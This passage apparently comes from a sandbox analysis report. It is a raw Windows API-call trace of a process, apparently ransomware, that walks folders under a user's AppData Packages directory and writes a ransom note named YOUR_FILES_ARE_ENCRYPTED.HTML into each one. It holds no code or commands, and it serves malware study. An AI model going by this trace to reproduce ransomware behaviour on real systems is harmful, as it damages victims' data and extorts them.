dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.174] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.175] CloseHandle (hObject=0x324) returned 1 [0115.176] GetProcessHeap () returned 0x600000 [0115.176] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.176] GetProcessHeap () returned 0x600000 [0115.176] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.176] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30aac39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30aac39d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0115.176] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0115.176] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0115.176] GetProcessHeap () returned 0x600000 [0115.176] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0115.183] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0115.184] CloseHandle (hObject=0x320) returned 1 [0115.185] GetProcessHeap () returned 0x600000 [0115.185] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.185] GetProcessHeap () returned 0x600000 [0115.185] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0115.186] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ec6c618, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ec6c618, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.BingNews_8wekyb3d8bbwe", cAlternateFileName="MICROS~3.BIN")) returned 1 [0115.186] StrStrIW (lpFirst="Microsoft.BingNews_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.186] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe") returned 81 [0115.186] GetProcessHeap () returned 0x600000 [0115.186] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0115.188] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe" [0115.188] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\*" [0115.188] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ec6c618, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ec6c618, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.190] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ec6c618, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ec6c618, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0115.190] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e94b4e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0115.190] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.190] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC") returned 84 [0115.190] GetProcessHeap () returned 0x600000 [0115.190] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.191] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC" [0115.191] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\*" [0115.191] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e94b4e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.194] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e94b4e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0115.194] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0115.194] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.194] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCache") returned 94 [0115.194] GetProcessHeap () returned 0x600000 [0115.194] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.196] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCache" [0115.196] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCache\\*" [0115.196] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187f18, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.196] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187f18, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0115.197] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187f18, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0115.197] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.197] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0115.197] GetProcessHeap () returned 0x600000 [0115.197] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.199] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.200] CloseHandle (hObject=0x324) returned 1 [0115.200] GetProcessHeap () returned 0x600000 [0115.200] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.200] GetProcessHeap () returned 0x600000 [0115.200] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.200] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0115.200] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.200] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCookies") returned 96 [0115.200] GetProcessHeap () returned 0x600000 [0115.200] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.201] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCookies" [0115.201] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0115.201] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187f18, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x626878 [0115.201] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187f18, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0115.201] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187f18, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0115.201] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0115.201] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0115.201] GetProcessHeap () returned 0x600000 [0115.201] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.203] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.204] CloseHandle (hObject=0x324) returned 1 [0115.204] GetProcessHeap () returned 0x600000 [0115.204] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.204] GetProcessHeap () returned 0x600000 [0115.204] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.204] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0115.204] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.204] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetHistory") returned 96 [0115.204] GetProcessHeap () returned 0x600000 [0115.204] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.205] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetHistory" [0115.205] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0115.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187f18, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x626978 [0115.205] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187f18, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0115.205] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187f18, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0115.205] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0115.205] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0115.205] GetProcessHeap () returned 0x600000 [0115.205] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.206] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.208] CloseHandle (hObject=0x324) returned 1 [0115.208] GetProcessHeap () returned 0x600000 [0115.208] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.208] GetProcessHeap () returned 0x600000 [0115.208] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.209] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e971661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e971661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e971661, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="Temp", cAlternateFileName="")) returned 1 [0115.209] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.209] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, 